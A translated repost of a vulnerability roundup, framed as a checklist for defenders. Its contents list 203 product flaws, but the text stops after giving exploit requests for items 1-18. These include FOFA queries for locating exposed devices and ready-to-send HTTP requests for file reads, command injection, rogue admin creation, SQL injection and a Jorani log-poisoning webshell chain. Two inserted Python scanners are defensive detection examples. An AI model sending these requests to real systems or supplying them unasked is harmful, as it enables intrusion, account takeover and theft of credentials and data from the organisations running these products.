Public Internet Vulnerability Roundup 2023-09 to 2024-06 (repost)

Posted 2024-6-5 14:31:29
Public Internet Vulnerability Roundup 2023-09 to 2024-06
道一安全 2024-06-05 07:41 Beijing
The following article is from 网络安全新视界, author 网络安全新视界

Purpose: exploitation of N-day vulnerabilities accounts for a large share of real-world attack activity, and we hope this article helps defenders. Defensive teams can use it as a checklist when reviewing their own exposure.

Sources: the article covers 203 high-impact vulnerability POCs published in China and abroad between September 2023 and May 2024. All of them were collected from other public accounts or websites and compiled for publication by the 网络安全新视界 team.

Patches: every vulnerability listed is already public; contact the product vendor for patches or remediation guidance.

Content: because of length limits, a few very long POCs are replaced with the word PAYLOAD; search for the full POC yourself if you need it.

Legal: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend and it will be removed.

Statement

To keep things simple and easy to browse, there is no "reply to see the full list". This article is the complete version; when using it, search the page for the keyword you need.

Bookmark it if it is useful to you, or follow the public account (网络安全新视界).

Contents

01

1. StarRocks MPP database unauthenticated access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
10. Landray EIS collaboration platform api.aspx arbitrary file upload
11. Landray EIS collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. jshERP (华夏ERP) sensitive information disclosure
15. jshERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT management platform arbitrary file read
21. Dahua ICC intelligent IoT management platform random remote code execution
22. Dahua ICC intelligent IoT management platform log4j remote code execution
23. Dahua ICC intelligent IoT management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPTech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 permission bypass
66. Wanhu ezOFFICE collaboration platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. Newcapec (新开普) campus service management platform service.action remote command execution
77. F22 garment management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp arbitrary file upload
81. Uniview video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. DBAPPSecurity 明御 security gateway aaa_local_web_preview file upload
88. DBAPPSecurity 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. QAX 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
94. QAX 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated admin creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立讯 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 fire and rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging archiving and communication system (PACS) WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 smart parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益价值管理系统 DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle GPS monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 project management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical browsing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behaviour management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. Aliyundrive WebDAV command injection
199. cockpit assetsmanager_upload interface file upload
200. SeaCMS dmku SQL injection
201. Founder all-media news editing system binary SQL injection
202. WeEngine (微擎) AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC List

02

1. StarRocks MPP database unauthenticated access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 of the password you want the new account to have.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

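POCs 1 to 7 are all single unauthenticated GET requests, so the cheapest retrospective check a defender can make is to grep access logs for those request targets. The scanner below is an added example, not code from the original article or from any of the vendors; the indicator paths are taken from the seven POCs above, while the rule names and the sample log lines are constructed for this example. It percent-decodes the target until it stops changing before matching, so `..%2F` and `%252e%252e` forms of the Casdoor traversal are caught as well as the literal `../` form.

```python
"""Scan access logs for the request paths used in POCs 1 to 7.

Added example; not part of the original article or any vendor code. The
indicator paths come from the POCs above; the rule names and the sample
log lines are constructed for this example.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# (rule name, request path prefix, required query parameter or marker)
INDICATORS = [
    ("starrocks-mem_tracker", "/mem_tracker", None),
    ("casdoor-static-traversal", "/static/", "TRAVERSAL"),
    ("easycvr-userlist", "/api/v1/userlist", None),
    ("nuuo-debugging-center", "/__debugging_center_utils___.php", "log"),
    ("sangfor-ngaf-loadfile", "/svpn_html/loadfile.php", "file"),
    ("hongyun-808gps-download", "/808gps/MobileAction_downLoad.action", "path"),
]

# Request line inside a combined-format log entry: "GET /path HTTP/1.1"
_REQ = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def normalize(target: str, max_rounds: int = 5) -> str:
    """Percent-decode until stable so ..%2F and %252e%252e both become '..'."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def classify(request_target: str) -> list:
    """Return the names of every indicator the request target matches."""
    parts = urlsplit(normalize(request_target))
    path = parts.path
    query = parse_qs(parts.query, keep_blank_values=True)
    hits = []
    for name, prefix, required in INDICATORS:
        if not path.startswith(prefix):
            continue
        if required is None:
            hits.append(name)
        elif required == "TRAVERSAL":
            # Casdoor: only the traversal form matters; normal /static/ is fine
            if "../" in path or "..\\" in path:
                hits.append(name)
        elif required in query:
            hits.append(name)
    return hits


def scan_log(lines) -> list:
    """Return [(line_number, [rule names])] for every line that hits."""
    results = []
    for n, line in enumerate(lines, 1):
        m = _REQ.search(line)
        if m:
            hits = classify(m.group("target"))
            if hits:
                results.append((n, hits))
    return results


# Constructed sample log in combined format; lines 3 and 8 are benign.
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Jun/2024:09:01:10 +0800] "GET /mem_tracker HTTP/1.1" 200 5120 "-" "curl/8.0"',
    '10.0.0.5 - - [05/Jun/2024:09:01:12 +0800] "GET /static/..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1803 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [05/Jun/2024:09:02:00 +0800] "GET /static/js/app.js HTTP/1.1" 200 88213 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [05/Jun/2024:09:03:41 +0800] "GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1" 200 742 "-" "python-requests/2.31"',
    '10.0.0.9 - - [05/Jun/2024:09:04:02 +0800] "GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1" 200 31 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [05/Jun/2024:09:04:30 +0800] "GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1" 200 1803 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [05/Jun/2024:09:05:00 +0800] "GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1" 200 611 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [05/Jun/2024:09:06:00 +0800] "POST /api/v1/login HTTP/1.1" 200 120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, hits in scan_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(hits)}")
```

Matching on the decoded path rather than the raw request line is the important part: a rule written as a literal `/static/../` would miss the encoded variant on line 2, and a rule that only looks for `loadfile.php` would fire on every legitimate call, so the rules above require the parameter that the POC actually abuses.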
8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin backend with the default admin account first, then send:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<the cookie obtained when logging in>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--


9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The keyword value is the statement below, double URL-encoded (every character percent-encoded, then the result percent-encoded again), with a literal 1 in front of it:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray EIS collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. Landray EIS collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: request the login page to obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip


The csrf_cookie_jorani value from the response is reused in the following requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding


Step 2: POST the login form. The login field carries a PHP stub that runs system() on the base64-decoded value of a custom request header, and the language parameter uses ../ traversal to point at the application/logs directory, so the stub ends up in the day's log file.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPassword


Step 3: send the following request to the target to run the id command. The header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

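Two of the POCs above rely on encoding to get past simple filters: POC 9 wraps an extractvalue() injection in two layers of percent-encoding, and POC 12 hides a ../ traversal in Jorani's language field behind one layer. The script below is an added example, not part of the original article: it shows why a filter that decodes once misses POC 9, and how decoding until the value stops changing fixes that. POC9_KEYWORD is the keyword value quoted in POC 9 verbatim; the signature names, the percent-encoding helper used to rebuild that value, and the sample Jorani body (with the PHP stub replaced by a plain username) are constructed for this example. The time-based form used by POC 26 further down (waitfor delay) is included as a third signature.

```python
"""Decode repeated URL encoding before matching parameter values.

Added example; not part of the original article. POC9_KEYWORD is the
keyword value quoted in POC 9; everything else here is constructed.
"""
import re
from urllib.parse import parse_qsl, unquote

SQLI_PAYLOAD = "' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#"

# keyword= value exactly as it appears in POC 9; the leading "1" is unencoded.
POC9_KEYWORD = "1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33"

# Constructed body modelled on the POC 12 login POST (PHP stub replaced by "user").
JORANI_BODY = (
    "csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77"
    "&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs"
    "&login=user&CipheredValue=DummyPassword"
)

SIGNATURES = {
    "sqli-error-based": re.compile(r"\b(?:extractvalue|updatexml)\s*\(", re.I),
    "sqli-time-based": re.compile(r"\bwaitfor\s+delay\b|\bsleep\s*\(", re.I),
    "sqli-tautology": re.compile(r"'\s*(?:and|or)\s+", re.I),
    "path-traversal": re.compile(r"\.\./|\.\.\\"),
}


def percent_encode_all(s: str) -> str:
    """Encode every byte as lowercase %xx, the way the POC 9 value was built."""
    return "".join(f"%{b:02x}" for b in s.encode("utf-8"))


def double_encode(s: str) -> str:
    """Apply percent_encode_all twice: the POC 9 construction."""
    return percent_encode_all(percent_encode_all(s))


def normalize(value: str, max_rounds: int = 5) -> str:
    """Percent-decode until the value stops changing (bounded to avoid loops)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def match_params(query_or_body: str, single_decode: bool = False) -> dict:
    """Map parameter name -> matched signature names.

    parse_qsl removes one encoding layer; with single_decode=True we stop
    there, which is what a naive filter does and why POC 9 gets past it.
    """
    hits = {}
    for name, raw in parse_qsl(query_or_body, keep_blank_values=True):
        value = raw if single_decode else normalize(raw)
        matched = [sig for sig, rx in SIGNATURES.items() if rx.search(value)]
        if matched:
            hits[name] = matched
    return hits


if __name__ == "__main__":
    print("decoded keyword:", normalize(POC9_KEYWORD))
    print("naive filter:   ", match_params("keyword=" + POC9_KEYWORD, single_decode=True))
    print("normalised:     ", match_params("keyword=" + POC9_KEYWORD))
    print("jorani body:    ", match_params(JORANI_BODY))
```

The same normalisation belongs in the application itself, not only in the filter: a parameter should be decoded once by the framework and then used as-is, and any code that decodes a second time (or lets the database do so) is exactly what makes the double-encoded form of POC 9 work.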
13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. jshERP (华夏ERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. jshERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip


16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC makes the database evaluate HASHBYTES('MD5','1234'), i.e. compute the MD5 of 1234, inside the injected sort expression.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
        (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>


18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
